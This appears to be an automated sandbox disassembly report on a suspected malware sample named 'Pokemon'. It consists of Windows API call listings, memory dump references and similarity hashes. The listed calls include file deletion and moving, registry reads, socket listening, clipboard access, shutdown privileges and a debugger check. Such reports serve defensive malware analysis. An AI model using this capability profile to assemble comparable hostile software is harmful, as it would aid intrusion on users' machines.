• Opcode Fuzzy Hash: 8134300e774f5b4daa54316b6bd6c6df30a4c74e6147c3749b8d0858a63fab1d
• Instruction Fuzzy Hash: 5831B6B1500249ABDB21DFA0DC89FEB37BCEF89700F1040B6F649D60A1E77096958B64
APIs
• FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0010A203
• FindNextFileW.KERNEL32(00000000,?), ref: 0010A25E
• FindClose.KERNEL32(00000000), ref: 0010A269
• FindFirstFileW.KERNEL32(*.*,?), ref: 0010A285
• SetCurrentDirectoryW.KERNEL32(?), ref: 0010A2D5
• SetCurrentDirectoryW.KERNEL32(00157B94), ref: 0010A2F3
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0010A2FD
• FindClose.KERNEL32(00000000), ref: 0010A30A
• FindClose.KERNEL32(00000000), ref: 0010A31A
  • Part of subcall function 000FE399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 000FE3B4
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
Similarity
• API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*
• API String ID: 2640511053-438819550
• Opcode ID: b86866f92e0ade393f0bdf9b6115d7bdffaec1114e0efd688ef4bff2db4bbed6
• Instruction ID: ecfa253e74790856764cd92b95d9084066d41f0dd90ee5ff1248ba48e3c96cf3
• Opcode Fuzzy Hash: b86866f92e0ade393f0bdf9b6115d7bdffaec1114e0efd688ef4bff2db4bbed6
• Instruction Fuzzy Hash: 2231013150071DBECB20AFA4EC09EDE77ADAF45321F5001A1E890A20E1DBB1DE958A11
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0011D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0011C10E,?,?), ref: 0011D415
                                                                                                                                                                                                                                                                                        • Part of subcall function 0011D3F8: _wcslen.LIBCMT ref: 0011D451
                                                                                                                                                                                                                                                                                        • Part of subcall function 0011D3F8: _wcslen.LIBCMT ref: 0011D4C8
                                                                                                                                                                                                                                                                                        • Part of subcall function 0011D3F8: _wcslen.LIBCMT ref: 0011D4FE
                                                                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0011C99E
                                                                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0011CA09
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0011CA2D
                                                                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0011CA8C
                                                                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0011CB47
                                                                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0011CBB4
                                                                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0011CC49
                                                                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0011CC9A
                                                                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0011CD43
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0011CDE2
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0011CDEF
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3102970594-0
                                                                                                                                                                                                                                                                                      • Opcode ID: ab75b4315f72ec796eb90f75a9ca2e24d78f9ffa82a5d55ef3eb0ca622aa9e63
                                                                                                                                                                                                                                                                                      • Instruction ID: 8af20f5a242d6c143232135168f5e9bef9f96792162d51a46ac784e52d8383b2
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab75b4315f72ec796eb90f75a9ca2e24d78f9ffa82a5d55ef3eb0ca622aa9e63
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C9025371604200AFDB18DF28D895E6ABBE5FF49314F1884ADF449CB2A2D731ED46CB91
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00095851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000955D1,?,?,000D4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00095871
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FEAB0: GetFileAttributesW.KERNEL32(?,000FD840), ref: 000FEAB1
                                                                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 000FD9CD
                                                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 000FDA88
                                                                                                                                                                                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 000FDA9B
                                                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 000FDAB8
                                                                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 000FDAE2
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FDB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,000FDAC7,?,?), ref: 000FDB5D
                                                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000,?,?,?), ref: 000FDAFE
                                                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 000FDB0F
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                                                                                                                                      • String ID: \*.*
                                                                                                                                                                                                                                                                                      • API String ID: 1946585618-1173974218
                                                                                                                                                                                                                                                                                      • Opcode ID: 7e4782bf626ebbb542fd243f80fcf498a379ba3b2744ab3887c61bc466cbd22c
                                                                                                                                                                                                                                                                                      • Instruction ID: a203afaa78b8614cd0d3f81116810b5a5877c84a5d833eaabe6396eddd48b4ab
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7e4782bf626ebbb542fd243f80fcf498a379ba3b2744ab3887c61bc466cbd22c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7615D3180514DEECF11EBE0DA929FDB7B6AF14310F2040A6E50277592EB316F4AEB61
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1737998785-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 224680bd9b42ef42a09308a3f5ad22260b0d17eea3e840ac5370ba5eab29a677
                                                                                                                                                                                                                                                                                      • Instruction ID: 351e9eaaba55d441f921dd782fd321c9f9abca2ec4b8247e843bea9eef2905c4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 224680bd9b42ef42a09308a3f5ad22260b0d17eea3e840ac5370ba5eab29a677
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E3418B30604601EFD724CF15E889B55BBA0FF44318F15C0ADE8598BAA2CBB5ED82CB90
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000F205A
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000F2087
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F2010: GetLastError.KERNEL32 ref: 000F2097
                                                                                                                                                                                                                                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 000FF249
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                                                                                                                                      • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                                                                                                                                      • API String ID: 2234035333-3163812486
                                                                                                                                                                                                                                                                                      • Opcode ID: ac1ed662937459cebf80953eb23eecaad25bb62608fb1dc102e9c41c98a6a787
                                                                                                                                                                                                                                                                                      • Instruction ID: d105750f647699d7b92d6d78fd4390bd375565e3f22ff6fe0ae7ecdee995f0a8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac1ed662937459cebf80953eb23eecaad25bb62608fb1dc102e9c41c98a6a787
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E01DB766102196BEBA46278AC8AFFE72AC9F08394F150531FF12E29D2D6604D51B150
APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00111CD3
• WSAGetLastError.WSOCK32 ref: 00111CE0
• bind.WSOCK32(00000000,?,00000010), ref: 00111D17
• WSAGetLastError.WSOCK32 ref: 00111D22
• closesocket.WSOCK32(00000000), ref: 00111D51
• listen.WSOCK32(00000000,00000005), ref: 00111D60
• WSAGetLastError.WSOCK32 ref: 00111D6A
• closesocket.WSOCK32(00000000), ref: 00111D99
Memory Dump Source
• Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
Similarity
• API ID: ErrorLast$closesocket$bindlistensocket
• String ID:
• API String ID: 540024437-0
• Opcode ID: a5d7208802f2f0ca468a1568c53176b490b0d824bed667e649632036b60e26e9
• Instruction ID: ce3346147b1e91800c5d60c6a48bf5c0d12f11326442331a8c134929a9e5a4db
• Opcode Fuzzy Hash: a5d7208802f2f0ca468a1568c53176b490b0d824bed667e649632036b60e26e9
• Instruction Fuzzy Hash: 2D414031600140AFDB14DF68D498BA5FBE5AF46318F1885A8D9569F292C771ECC2CBE1
APIs
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,000D56C2,?,?,00000000,00000000), ref: 00103A1E
• FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,000D56C2,?,?,00000000,00000000), ref: 00103A35
• LoadResource.KERNEL32(?,00000000,?,?,000D56C2,?,?,00000000,00000000,?,?,?,?,?,?,000966CE), ref: 00103A45
• SizeofResource.KERNEL32(?,00000000,?,?,000D56C2,?,?,00000000,00000000,?,?,?,?,?,?,000966CE), ref: 00103A56
• LockResource.KERNEL32(000D56C2,?,?,000D56C2,?,?,00000000,00000000,?,?,?,?,?,?,000966CE,?), ref: 00103A65
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
Similarity
• API ID: Resource$CreateFindGlobalLoadLockSizeofStream
• String ID: SCRIPT
• API String ID: 3051347437-3967369404
• Opcode ID: f72bd45d34e5414051620b9cbe85629ddce058b69f0a0d48367c1efd0b068934
• Instruction ID: d4eb7eedf0d4227ebf50fe760b6ca0d40161feb70c559513ea782501b43c6aac
• Opcode Fuzzy Hash: f72bd45d34e5414051620b9cbe85629ddce058b69f0a0d48367c1efd0b068934
• Instruction Fuzzy Hash: 6D112771200701FFE7218B65EC49F277BBDEBC5B51F14426CB452D76A0DBB1E9418A60
APIs
  • Part of subcall function 000F1900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 000F1916
  • Part of subcall function 000F1900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 000F1922
  • Part of subcall function 000F1900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 000F1931
  • Part of subcall function 000F1900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 000F1938
  • Part of subcall function 000F1900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 000F194E
• GetLengthSid.ADVAPI32(?,00000000,000F1C81), ref: 000F20FB
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 000F2107
• HeapAlloc.KERNEL32(00000000), ref: 000F210E
• CopySid.ADVAPI32(00000000,00000000,?), ref: 000F2127
• GetProcessHeap.KERNEL32(00000000,00000000,000F1C81), ref: 000F213B
• HeapFree.KERNEL32(00000000), ref: 000F2142
Memory Dump Source
• Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
Similarity
• API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
• String ID:
• API String ID: 3008561057-0
• Opcode ID: c8e0a3db8190e893b6f2e68e2211abe2162aafa6ea8e3dc7ac33c38f782cb027
• Instruction ID: a8d329bd9421db54162630619816a42b112f16aa67151f39a1074ef247368b75
• Opcode Fuzzy Hash: c8e0a3db8190e893b6f2e68e2211abe2162aafa6ea8e3dc7ac33c38f782cb027
• Instruction Fuzzy Hash: 5D11DC72500208FFDB24DB64EC09BBE7BA9FF54355F104018EA4593920C7359D91EB64
APIs
  • Part of subcall function 0009B329: _wcslen.LIBCMT ref: 0009B333
• FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 0010A5BD
• FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 0010A6D0
  • Part of subcall function 001042B9: GetInputState.USER32 ref: 00104310
  • Part of subcall function 001042B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001043AB
• Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 0010A5ED
• FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 0010A6BA
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
Similarity
• API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
• String ID: *.*
• API String ID: 1972594611-438819550
• Opcode ID: 81ee736e3d9d1fdb4b3a1e9f1f0266fcefcf1e7093a08dc8ec9158aef742044b
                                                                                                                                                                                                                                                                                      • Instruction ID: 0cb0593e7cafbf0522c85c1f5c9ee122c0a8f930d8bdf898cd083bdfd666dba8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 81ee736e3d9d1fdb4b3a1e9f1f0266fcefcf1e7093a08dc8ec9158aef742044b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF416E7190020AAFCF14DFA4DD49AEEBBB8FF04310F644055E845A21E1EB719E94DFA1
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,?), ref: 0009233E
                                                                                                                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00092421
                                                                                                                                                                                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 00092434
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Color$Proc
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 929743424-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 57f3316b58cda13d2270c33b4f6de17406fe074f604b292b580bc3c999a80702
                                                                                                                                                                                                                                                                                      • Instruction ID: 75f724159e3d045984a26fcb1baad2abbf4f0d0f94de19a65ee880eceb65f093
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 57f3316b58cda13d2270c33b4f6de17406fe074f604b292b580bc3c999a80702
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 49814FF02086147EEE79663C9C98EBF15DEDB42300F15410AF102DA7D6CA598F52B277
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00113AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00113AD7
                                                                                                                                                                                                                                                                                        • Part of subcall function 00113AAB: _wcslen.LIBCMT ref: 00113AF8
                                                                                                                                                                                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 001122BA
                                                                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 001122E1
                                                                                                                                                                                                                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00112338
                                                                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 00112343
                                                                                                                                                                                                                                                                                      • closesocket.WSOCK32(00000000), ref: 00112372
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1601658205-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 2e2f57615e0169e4b77a0f26f759dda5eaef239bb2f83783f4aae978f47ca0c1
                                                                                                                                                                                                                                                                                      • Instruction ID: 3b82d2db5a164d96497cab8ade72414e08c5e8b273d594146daf38006214ebd8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e2f57615e0169e4b77a0f26f759dda5eaef239bb2f83783f4aae978f47ca0c1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A451C575A00200AFEB14EF64C886FAA77E5AF49754F448058F9599F3C3C774AD828BA1
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 292994002-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 2738d51f416ebdfd341fc33302952bdb20acbc000faa3a5e5d3cc5fed0cf199e
                                                                                                                                                                                                                                                                                      • Instruction ID: c915ba99f3e5488327a84b48c1e20d394ca1d928caa5e54b1f5388a73974eff5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2738d51f416ebdfd341fc33302952bdb20acbc000faa3a5e5d3cc5fed0cf199e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD213631704220AFD7249F26E844B5E7BE5FFA5314F19806CE8498B352CB71EC52CB90
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 0010D8CE
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 0010D92F
                                                                                                                                                                                                                                                                                      • SetEvent.KERNEL32(?,?,00000000), ref: 0010D943
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 234945975-0
                                                                                                                                                                                                                                                                                      • Opcode ID: d9f7b4fed4bd781e636003e3daaaa08c79e5ce9a567b482198824bccdd49eeb7
                                                                                                                                                                                                                                                                                      • Instruction ID: 004e3f2654052917ca48f371b7641ac7da3524b28149252cc395c382d25c71a6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d9f7b4fed4bd781e636003e3daaaa08c79e5ce9a567b482198824bccdd49eeb7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A216071500705EFE7309FA5E845BAAB7F8AB40318F10441EE68692592EBB4EA459B50
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,000D46AC), ref: 000FE482
                                                                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 000FE491
                                                                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 000FE4A2
                                                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 000FE4AE
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2695905019-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 60d7e574a26e7de5ffb02d32ef76e660f87e8f885e6f88dd4d7e87d7ce3ec6f0
                                                                                                                                                                                                                                                                                      • Instruction ID: 321560dad013112b0e3baa9857fd8e8539e9945ecb6b2b06906d59af62cea57c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60d7e574a26e7de5ffb02d32ef76e660f87e8f885e6f88dd4d7e87d7ce3ec6f0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 11F0A730410914A792246738FC0D47A76AEAF51336B504705F935C18F0D774E9A65695
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: LocalTime
                                                                                                                                                                                                                                                                                      • String ID: %.3d$X64
                                                                                                                                                                                                                                                                                      • API String ID: 481472006-1077770165
                                                                                                                                                                                                                                                                                      • Opcode ID: a51ecfdb036c39e5bdc08737f8b8dc46b1ff5e320e32dc02ed52a2bfb4a37a1c
                                                                                                                                                                                                                                                                                      • Instruction ID: 21d3578159ed9886fa149acdcb522a12418e411f233b05a09d95ddb79460c883
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a51ecfdb036c39e5bdc08737f8b8dc46b1ff5e320e32dc02ed52a2bfb4a37a1c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5D0ECA180418DEACAE49791DC88DBD727CBB28341F604862F906B1040E62099489621
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 000C2A8A
